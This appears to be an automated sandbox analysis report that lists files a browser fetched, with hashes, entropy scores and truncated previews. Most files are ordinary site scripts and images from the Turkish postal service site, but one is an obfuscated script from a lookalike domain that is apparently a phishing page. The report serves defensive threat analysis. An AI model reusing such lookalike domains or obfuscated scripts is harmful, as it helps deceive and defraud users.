                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):107769
                                                                                                                                                                                            Entropy (8bit):5.260222975099075
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:QEwre8DaBX8SWbVqLgZ/zxFTA89cdUi7xp5AM4//6pSC:QEO2BX8zzzeUi7x/A9wSC
                                                                                                                                                                                            MD5:610DA2CE6C9014742E009DBB54D06628
                                                                                                                                                                                            SHA1:2C1F903E8D6F628C54ABF209C8B4A27C848BF6A0
                                                                                                                                                                                            SHA-256:66724B029326372C20E74845946256FED8D27A064EB5CCE3B8DA31ACFD0FA028
                                                                                                                                                                                            SHA-512:D940574C28CC677CEA0DEEF46518C5F15107D3CBE099537601251ACCB3DAA63FE9634D8E8B5AA584F4D690189AD2B27BE8AC950325E8DE241A91850B6B3221E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/main-8430b752c8e66574.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{3735:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then((function(r){return t.resolve(e()).then((function(){return r}))}),(function(r){return t.resolve(e()).then((function(){throw r}))}))})},8565:function(e){var t=function(e){"use strict";var t,r=Object.proto
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):18614
                                                                                                                                                                                            Entropy (8bit):7.842656829907835
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:1t61ypWjXqE+0b5KjYyr/Rl4I29curptBVL+VWrapslaYo:1QrjXqEnolyd3BqeapZX
                                                                                                                                                                                            MD5:5C8C2703821C3A1F3D4600D64E1DB92D
                                                                                                                                                                                            SHA1:060647274799061728A0F06E7B8C3EC61EB64439
                                                                                                                                                                                            SHA-256:4B9A02D91E97FA5B053EB85955E9C38A2594E2667838181748BBDF70BDE901A5
                                                                                                                                                                                            SHA-512:4813636EE30E3E082763DA35A6E454081AFB39466FDB553215A66B429328A8DC8A3D24987A26ADC6D1D78D70301C6BBFCDA99D51CFA799DBB9BBE10668097016
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..HCIDATx.....\e............&.....iDWGd..8.3.i..wW....av.4^Vfu.Yv.Q?#.E.e\H.q........C...$. .t.s..O......rnu.}?..Cw]N.:U._..y.T*%....-.!.........B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8B....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q... .........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q.8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B....!.....8........`.`....j4.....B~.....j.n...f...2...[z.3.d............2...K.8..P].m..,,p.vB\nt....J..^.............J..l.[>=>.=I......om.]..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (31998)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):44344
                                                                                                                                                                                            Entropy (8bit):5.0794867253052916
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aCI7dmuMFAAJG4dlQKNORpnXGAtep2lcwJeL+wr2RS0c7UuHjRUQuFBt33:pITMFC4dbMVRS0cgRDV
                                                                                                                                                                                            MD5:C7B7F245D361390E332E902506977D60
                                                                                                                                                                                            SHA1:BF6F8E0078FE25F5CDC91565492D78B7363AC904
                                                                                                                                                                                            SHA-256:DE5591E013E80C7CADAD861C3B40AE2331FD2A66FD8AC9A88983D02A0AA7194B
                                                                                                                                                                                            SHA-512:BCD684C03075666AB07653F5779F7106C1A31C83308FEB82BE4B8A1208D1A3B2A5B5E0CB9320990E2B5ECE2BDEFEDB3D442DD4BEEC33DDFEE2E1A88573D71C73
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. !function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({fi
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2682
                                                                                                                                                                                            Entropy (8bit):4.4904670747715585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:t4o1WOIsLcS4VCFTDOLLTuZQ161xxM1tltkOJXKu5PfPMXIiz6NcS4VCFTDOLLzx:pbLc3o2LTu+2F+amc3o2LU+GGBWGVH6I
                                                                                                                                                                                            MD5:A9DDCD4D865D3F2E85BDBB9BF38F73C6
                                                                                                                                                                                            SHA1:435CC4E8C5417268BECF4DE5021EDA6A558B6B11
                                                                                                                                                                                            SHA-256:38D713D08730A4398FB0AA408912957A0C19E1FFC8A4DA071547DBFA00C5E485
                                                                                                                                                                                            SHA-512:A3540ACC364E53A2E428F44BDD67D72293184FF5555692D0880C4C04EEB443D1CE41E2A7A9327D92DAA2BE93D0AE3BCA14DB571291DA3AE2269AA693EAD44A7E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/img/microphone_open.svg
                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" height="512pt" version="1.1" viewBox="-90 0 512 512.00001" width="512pt">.<g id="surface1">.<path d="M 331.964844 275.082031 C 331.964844 266.652344 325.128906 259.816406 316.695312 259.816406 C 308.261719 259.816406 301.425781 266.652344 301.425781 275.082031 C 301.425781 349.769531 240.667969 410.527344 165.980469 410.527344 C 91.296875 410.527344 30.539062 349.769531 30.539062 275.082031 C 30.539062 266.652344 23.703125 259.816406 15.269531 259.816406 C 6.835938 259.816406 0 266.652344 0 275.082031 C 0 361.460938 66.320312 432.621094 150.714844 440.355469 L 150.714844 481.460938 L 94.046875 481.460938 C 85.613281 481.460938 78.777344 488.296875 78.777344 496.730469 C 78.777344 505.164062 85.613281 512 94.046875 512 L 237.917969 512 C 246.347656 512 253.1875 505.164062 253.1875 496.730469 C 253.1875 488.296875 246.347656 481.460938 237.917969 481.460938 L 181.25 481.460938 L 181.25 440.355469 C 265.644531 432.625 331.964844 361.460938 331.96484
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (31998)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):44344
                                                                                                                                                                                            Entropy (8bit):5.0794867253052916
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:aCI7dmuMFAAJG4dlQKNORpnXGAtep2lcwJeL+wr2RS0c7UuHjRUQuFBt33:pITMFC4dbMVRS0cgRDV
                                                                                                                                                                                            MD5:C7B7F245D361390E332E902506977D60
                                                                                                                                                                                            SHA1:BF6F8E0078FE25F5CDC91565492D78B7363AC904
                                                                                                                                                                                            SHA-256:DE5591E013E80C7CADAD861C3B40AE2331FD2A66FD8AC9A88983D02A0AA7194B
                                                                                                                                                                                            SHA-512:BCD684C03075666AB07653F5779F7106C1A31C83308FEB82BE4B8A1208D1A3B2A5B5E0CB9320990E2B5ECE2BDEFEDB3D442DD4BEEC33DDFEE2E1A88573D71C73
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/owl.carousel.min.js
                                                                                                                                                                                            Preview:/**. * Owl Carousel v2.3.4. * Copyright 2013-2018 David Deutsch. * Licensed under: SEE LICENSE IN https://github.com/OwlCarousel2/OwlCarousel2/blob/master/LICENSE. */. !function(a,b,c,d){function e(b,c){this.settings=null,this.options=a.extend({},e.Defaults,c),this.$element=a(b),this._handlers={},this._plugins={},this._supress={},this._current=null,this._speed=null,this._coordinates=[],this._breakpoint=null,this._width=null,this._items=[],this._clones=[],this._mergers=[],this._widths=[],this._invalidated={},this._pipe=[],this._drag={time:null,target:null,pointer:null,stage:{start:null,current:null},direction:null},this._states={current:{},tags:{initializing:["busy"],animating:["busy"],dragging:["interacting"]}},a.each(["onResize","onThrottledResize"],a.proxy(function(b,c){this._handlers[c]=a.proxy(this[c],this)},this)),a.each(e.Plugins,a.proxy(function(a,b){this._plugins[a.charAt(0).toLowerCase()+a.slice(1)]=new b(this)},this)),a.each(e.Workers,a.proxy(function(b,c){this._pipe.push({fi
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):77678
                                                                                                                                                                                            Entropy (8bit):5.213189247182647
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:w1BdHluH4ayXM1ZFnqHfbm2GL8Y33xQUOWcKPX+tcQ1ZvGgbng5iCaK828:p4aycxnYU33xQ3eg3CaK8v
                                                                                                                                                                                            MD5:A68954C92CBC306929A026FB8BE5389E
                                                                                                                                                                                            SHA1:4B8AC7EB075343DA16FEE848C9B6A6C80B6C1484
                                                                                                                                                                                            SHA-256:83500803B415AFC9A4F8496789CBA919D635DDE3ADC041A8A69B62F71071BCA7
                                                                                                                                                                                            SHA-512:2D1E103916519B5352EEE20A58A33D5075E43BF7358EF516320738E2C2B9154C8F1B8EC6CC6751FB8F6A7EB9994B9D56EAE4BC589BBE03605010BFE06CF61AA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:function defineAloChat(){var c={app_environment:"local",name:"Alotech Chat JS",hostname:"",username:"",chatText:"#chat-text",chatMessage:".mar-btm",btnSendMessage:"#btnSendMessage",aloChatLogout:"#alo-chat-logout",modalChatHistory:"#modalChatHistory",btnChatHistoryY:"#btnChatHistoryY",btnChatHistoryN:"#btnChatHistoryN",modalChatLogoutConfirm:"#modalChatLogoutConfirm",btnChatLogoutConfirmY:"#btnChatLogoutConfirmY",btnChatLogoutConfirmN:"#btnChatLogoutConfirmN",inputUserNameSurName:"#name",queueMessage:"#queue_message",footer:"#footer",chatTags:"#chat_tags",inputPhoneNumber:"#phone_number",inputEmail:"#email",user_email:"",user_phone_number:"",uid:"",cwid:"",ws_server:"chatserver.alo-tech.com",lang:"en",tags:[],optional_email:"",optional_phone:"",hide_email:"",hide_phone_number:"",title:"",title_background_color:"",title_text_color:"",subtitle:"",height:300,width:300,queue:[],legal_requirements:0,widget_version:"",frmStartChat:"#frmStartChat",inputLang:"#lang",inputActiveChatKey:"#active
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (11524)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):11574
                                                                                                                                                                                            Entropy (8bit):5.332302381529318
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:7v+CNp6/anNwCPXjBobJHnycoYIWx6T334MjbxN5AZOva/rL6twJwg1uvbqXGA6g:7rfManGCPXjSJmxg09bxHAYvun3DX20j
                                                                                                                                                                                            MD5:DAC5D6A1FCFC7602CA1135B80C4AEAC7
                                                                                                                                                                                            SHA1:85A3FB6333CF317B57F44A327BE09E31590D5912
                                                                                                                                                                                            SHA-256:E1B2B0D74DCF5FA0839F03D26D57EA6CF629004C0707755B8B70E51EEC14AD23
                                                                                                                                                                                            SHA-512:C3EBA50A7AD6212686D13A581FF58B68B915280234445293D2A085AC6C0480861065517AAF290CF46EF81BF8ABE255D2FE9009EF23BDA33894A8692E1284EBE9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4412],{8953:function(e,t,n){"use strict";var r=n(8565),a=n.n(r),s=n(3288),u=n(2267),c=n.n(u),o=n(2466),i=n(6731),l=n.n(i),f=n(3395),p=n(3230),v=n(8082),h=n(2493),d=n.n(h),y=n(1295),_=n(427),m=n(1270),w=n(1395);function g(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=new Array(t);n<t;n++)r[n]=e[n];return r}function x(e,t,n,r,a,s,u){try{var c=e[s](u),o=c.value}catch(i){return void n(i)}c.done?t(o):Promise.resolve(o).then(r,a)}function T(e){return function(){var t=this,n=arguments;return new Promise((function(r,a){var s=e.apply(t,n);function u(e){x(s,r,a,u,c,"next",e)}function c(e){x(s,r,a,u,c,"throw",e)}u(void 0)}))}}function b(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!==typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var r,a,s=[],u=!0,c=!1;try{for(n=n.call(e);!(u=(r=n.next()).done)&&(s.push(r.value),!t||s.length!==t);u=!0);}catch(o){c=!0,a=o}final
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (52146)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):53104
                                                                                                                                                                                            Entropy (8bit):5.227530657260376
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:TMmDcX+V9NQhASRs39o2sBabuVV0cI7fxDRUZq:TRAX+7/RsBKuj0cI7VRUZq
                                                                                                                                                                                            MD5:A776E06B72C85E797B740BD2D8B72177
                                                                                                                                                                                            SHA1:178F266CB57B535F9026210BD0A81E2D4F661F54
                                                                                                                                                                                            SHA-256:59E40E563B52ED0F9F6F98F299618ECCC9A75F47CFEE7B4125BBE5D548AD3C31
                                                                                                                                                                                            SHA-512:80026AF0668053BF6BA7EC6BD5261F885CDDB06191E9EE2D60E8B05413FE579E44D9E6D24B682246209D3E08AA835917AF4B9BC50A2A4D265FC5F7DA6B16EE69
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/37d8eb31JxKnW.js
                                                                                                                                                                                            Preview:const a9_0x13d023=a9_0x3647;(function(_0x1c0f4c,_0x5b4f7e){const _0x18c0e3=a9_0x3647,_0x35d09c=_0x1c0f4c();while(!![]){try{const _0xa80895=-parseInt(_0x18c0e3(0xfb))/0x1*(parseInt(_0x18c0e3(0x12e))/0x2)+parseInt(_0x18c0e3(0x19c))/0x3+-parseInt(_0x18c0e3(0x108))/0x4*(parseInt(_0x18c0e3(0x1aa))/0x5)+parseInt(_0x18c0e3(0x1a2))/0x6*(-parseInt(_0x18c0e3(0x1c8))/0x7)+-parseInt(_0x18c0e3(0x16a))/0x8+parseInt(_0x18c0e3(0x1be))/0x9+-parseInt(_0x18c0e3(0x14a))/0xa*(-parseInt(_0x18c0e3(0x106))/0xb);if(_0xa80895===_0x5b4f7e)break;else _0x35d09c['push'](_0x35d09c['shift']());}catch(_0x5b3a28){_0x35d09c['push'](_0x35d09c['shift']());}}}(a9_0x5403,0x5a626));import{s as a9_0x30f9d7,u as a9_0x1f3b06,x as a9_0x2ee3d1,r as a9_0x4c70bc,n as a9_0x803a5b,y as a9_0x3e60a4,d as a9_0x255cc3,z as a9_0x46165c,A as a9_0x2b3cd7,a as a9_0x5a4862,w as a9_0x273496}from'./index-f5457718.js';/*!. * vue-router v4.1.6. * (c) 2022 Eduardo San Martin Morote. * @license MIT. */.const G=typeof window<'u';function nt(_0xe
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (8249), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8249
                                                                                                                                                                                            Entropy (8bit):5.0469122250162055
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:Nke907L+dS779XppCl9v8p4sLsm5id6FmPv:Nke907bXZplF4v
                                                                                                                                                                                            MD5:FF70CBA0168B8803E70EA85ADDAAECB0
                                                                                                                                                                                            SHA1:05F9C7716E21EC93AFCC29AA7644CE8109169FC0
                                                                                                                                                                                            SHA-256:C9BDAEB63F2279C6968B64944978519CE857E1AE3E4A4D5CD2E59317A261BA19
                                                                                                                                                                                            SHA-512:B1879FFB61E4CA9237264F6A560E52A4D8168E03F1629C46893B4969F15C77F9C50C86A5F0691C13E6181CB61EF9260424995D91FD5FF8FEDD54818830BA43C1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:self.__BUILD_MANIFEST=function(e,i,a,s,t,r,c,n,d,u,o,g,p,l,m,h,k,f,b,j,y,F,P,_,I){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[i,a,s,t,r,"static/css/2425cba10de1645b.css","static/chunks/pages/index-81bebd65698c8415.js"],"/_error":["static/chunks/pages/_error-32d9baaae5c99c79.js"],"/anket":[c,"static/chunks/pages/anket-2610e69587780097.js"],"/anket/[slug]":[c,"static/chunks/pages/anket/[slug]-1b52832c21c28bd1.js"],"/doviz-kurlari":["static/chunks/5698-10f078fe5b68f680.js","static/css/386d6f9094f2dfbc.css","static/chunks/pages/doviz-kurlari-5a26b114db728c07.js"],"/duyurular":[s,"static/css/3cbd8bcfbd63f115.css","static/chunks/pages/duyurular-8d6cda8f6e9d3111.js"],"/duyurular/[slug]":["static/css/6fd0127afe4f9150.css","static/chunks/pages/duyurular/[slug]-1f9ac4bc183a7385.js"],"/galeri":[i,a,n,"static/chunks/pages/galeri-e8845bfe84a8e178.js"],"/galeri/[slug]":[i,a,n,"static/chunks/pages/galeri/[slug]-7fb28712356cc23b.js"],"/gonderi-ucreti-hesaplama":[e,d,u,o,g,p,l,m,h
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):42406
                                                                                                                                                                                            Entropy (8bit):7.97968488859527
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:1oorXSxmPWLkL/IYHs6jipHKCwcT/ZtGJ2AlAGhF22x35kt+YDQpA2ooObEgH4S:1owXS/LkUSLj2Zwc+J2CpLxJruEgH/
                                                                                                                                                                                            MD5:0B94ED4D25A30530E566195F0F3ADE8B
                                                                                                                                                                                            SHA1:BF9184B5FCE613FF573CB63DAB6D52520663D8A2
                                                                                                                                                                                            SHA-256:C35D251C45608F6A64A6EF58590A36C580AD0BC1B0AC53697F2B9398FD64D626
                                                                                                                                                                                            SHA-512:33E3CC1D4D25628253C632313981E568C75CB65E70B391DF0E86463CF0DC9A6490D18384CDEDF61304D2623A1CC485A5621B814DAD83A7A7EE0590D14BD98EF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:RIFF....WEBPVP8X..............ALPH.}....'$H..xkD..9..aR...?..1..>R7@.'...XH5.(c.?..g)...>...8(....[..[..Q..K;....e.hf...ZIja....n.fVfj..w .\..D....y>.y.s.........o.=W.m.:i"". *..b....K.x.[.Ql..c.`.wcM4...F..k..&........s.qN%......#..........N....7...Z.7..m1.Q#.,C.Y.?.+.R.pPN@A....q..j.....U.`.a.-*.8..G%<2....N.5........j.Q5....~..G........7..>..w..a.|../..WwC...).lU6X........5?.2.Zh...u5....4....1.:h.-o.W.....p..P.....;..c...@..[T...y.{..o.6....\..g...\.....}.5_M....(...a....Y....n.......C..pJ...........3.\.G..j..'..x.T.h.1@........(.9...a.j....Q...X....|>....@.......0W_.AZ..$..X/....1.....N....{....\@y....].Ey..f.'.........o5.p.%.....*...i..@9-.\bn..RU.....Q..f56...y._.vC..7..Z......6.'.....f..G.TW....%t.p..3.~0.....%<v...}..t'.0.I..x...h....1..*.LV}`..}. ..:.'........0PQG..j:@W-.se.B..4..U3..U.......S...I...j..#.........4.B.)....u1\S~.=.....|vT2...Yz..#6!.PK..\O+.LS...........1Q..%...Ry`....j..rZ...N.T.>..WQ>......h.....@...x..jk&PZ.r..4....2...
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (31081), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):31903
                                                                                                                                                                                            Entropy (8bit):5.810923490394336
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:w3iGBkJwiSWzYLyD2ZtS2zF7TzrCaYaIUcrUCFNGwp88Qk238EAfRg9Zr5MHNw9+:wISWYzzNPua/sF+XDACqSRh5/xa21ib
                                                                                                                                                                                            MD5:A01B6E8CE8881B6A2B02061495A8BC47
                                                                                                                                                                                            SHA1:EB4A3F16A6B63BA67B60B4278E06D3384DEC9F93
                                                                                                                                                                                            SHA-256:D6CACA3906FF959A963479874F22DDC7762E575DF6A3065B97D9B079F1AA9A57
                                                                                                                                                                                            SHA-512:DB14B98A778C20BD411E06D6401F95382F4AB959F5563F8D8DF827C59D69BC9A521382FD4C83DDEC459C81C30F9E8151C1455B7703CFFD23E5C188A4D568F208
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkify=function(u){"use strict";var e="aaa aarp abarth abb abbott abbvie abc able abogado abudhabi ac academy accenture accountant accountants aco actor ad adac ads adult ae aeg aero aetna af afl africa ag agakhan agency ai aig airbus airforce airtel akdn al alfaromeo alibaba alipay allfinanz allstate ally alsace alstom am amazon americanexpress americanfamily amex amfam amica amsterdam analytics android anquan anz ao aol apartments app apple aq aquarelle ar arab aramco archi army arpa art arte as asda asia associates at athleta attorney au auction audi audible audio auspost author auto autos avianca aw aws ax axa az azure ba baby baidu banamex bananarepublic band bank bar barcelona barclaycard barclays barefoot bargains baseball basketball bauhaus bayern bb bbc bbt bbva bcg bcn bd be beats beauty beer bentley berlin best bestbuy bet bf bg bh bharti bi bible bid bike bing bingo bio biz bj black blackfriday blockbuster blog bloomberg blue bm
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (56758)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):56808
                                                                                                                                                                                            Entropy (8bit):5.646177181712691
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:P+fYxCbRGCdY2M1T5Ti7hpRPJrYBC8ZTjlQMTCs/VhTP4TqCEWpN0kz35AFW2s:P+fbRhbjX9QZTFDVPw3YW2s
                                                                                                                                                                                            MD5:0216C2DA5703B33A746912DC8E3BEB8A
                                                                                                                                                                                            SHA1:3F0B87653D40A5A5C5B8767F830CAD59C33E6426
                                                                                                                                                                                            SHA-256:641E155CCF8052978B7126668711C5606358D5B6103BFC03601613153D7E7A8F
                                                                                                                                                                                            SHA-512:B608457CD061584F237AA712895F0A55231993C677920DF50CA3A3030A0D15EEB1E9D03F147B99C3DD1446CA512151E8D16086C9C1735748461F1A4C2817C35A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/static/chunks/4110-03c15b7eaf980721.js
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4110],{1295:function(e,n){"use strict";n.Z={src:"/_next/static/media/no-image.77f0b5fb.jpg",height:300,width:500,blurDataURL:"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAoKCgoKCgsMDAsPEA4QDxYUExMUFiIYGhgaGCIzICUgICUgMy03LCksNy1RQDg4QFFeT0pPXnFlZXGPiI+7u/sBCgoKCgoKCwwMCw8QDhAPFhQTExQWIhgaGBoYIjMgJSAgJSAzLTcsKSw3LVFAODhAUV5PSk9ecWVlcY+Ij7u7+//CABEIAAUACAMBIgACEQEDEQH/xAAoAAEBAAAAAAAAAAAAAAAAAAAABwEBAQAAAAAAAAAAAAAAAAAAAAH/2gAMAwEAAhADEAAAALAI/8QAGxAAAgEFAAAAAAAAAAAAAAAAAQIAAxETITH/2gAIAQEAAT8AFN1a2Z230z//xAAVEQEBAAAAAAAAAAAAAAAAAAAAEf/aAAgBAgEBPwCP/8QAFREBAQAAAAAAAAAAAAAAAAAAABH/2gAIAQMBAT8Ar//Z"}},8196:function(e,n,t){"use strict";t.d(n,{Z:function(){return O}});var s=t(8565),r=t.n(s),a=t(3288),i=t(2466),l=t(3395),c=t(2260),o=t.n(c),u=t(8082),d=t(2718),h=t(3230),f=t(9792),p=t(1011),_=t(8810),m=t(6731),y=t.n(m);function v(e,n){(null==n||n>e.length)&&(n=e.length);for(var t=0,s=new Array(n);t<n;t++)s[t]=e[t];return s}fun
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):7148
                                                                                                                                                                                            Entropy (8bit):7.945839730308709
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:N7ZAXeFaEn8qr8WbCYt5+KIcr/UrowzfTIHxRn7UgUG7jvxPemLbPppFIjIIle:dZAuFeWbCYtCroKix93U2xPe2aIC
                                                                                                                                                                                            MD5:641DD16D1D00C8604EB6179270111AE9
                                                                                                                                                                                            SHA1:184E0869FA5B954733CD187B9C9AFC8E6565BC92
                                                                                                                                                                                            SHA-256:9A893C19F8C7DB3E1BC28AC41802909856003C35040A6091F8C02B59D1ED5CD2
                                                                                                                                                                                            SHA-512:DFDE9BF1B3F449C9B157324C952C4213A4828A084BC3BD37AB6801C2E916942A45203C57E41B774D54EF60E1100204BEE5D0CA453B9835791C08F2BAAC62BF63
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.ptt.gov.tr/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F183logo.a09f11f7.png&w=256&q=75
                                                                                                                                                                                            Preview:RIFF....WEBPVP8X...........e..ALPH.......m.9..m.y....&J....-...........Mp....-...I..Df.K...u.sO.t..ODL..... x.. ..0.....&F`.C...rE....M./.ZBW.........Bu..".......L...g.V...\.t1.?L{...I.l...:..._b'm.w..h.Y\...>..Z..+df.F.;IO.....g...lw............../...S.....^q.u.Xo.Q...k...J.k5B...M.1.7...Y.....I...=....>...^.k..b.J...1c..;~....k.s..FW,.....7..@...k..`..BX.G/.1.e....M..z.....(.Xw.c....c.G....D..c..;.mq...1.".......=....j..9..^...k......d? ."..q.c.<.?...m.0~...;.X......xA..v;.8.K.....;.2...D.1.fnP..gN.\;.Q.2..oxwV...z#...O.\...o%,n....3i..S.<Z.D.Q..^..``..L...C....)I.g..Q.<..}*?.J....T.?.....u|......$..go>rt_.....T-L..%.>...jO.\;.L..PI.H..ce.....j.,.x.31U.$.j..&..m.+..Zw.$.J...../.v.NZ.....S...<.Jw.EvV*.Z.7..As.+..:..&6...4..%...R...Jk.q.S....l|q...~<....\...o....m...Uu...h.4.....+...24.`M.W.9...k..h..D.......L....1..4g^.m?.....";.....l..on..pk..4)LsI..XZ.h........5s..`..Em.../.....N*r.SU.np...U.D..{...J....L.U..8.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):41
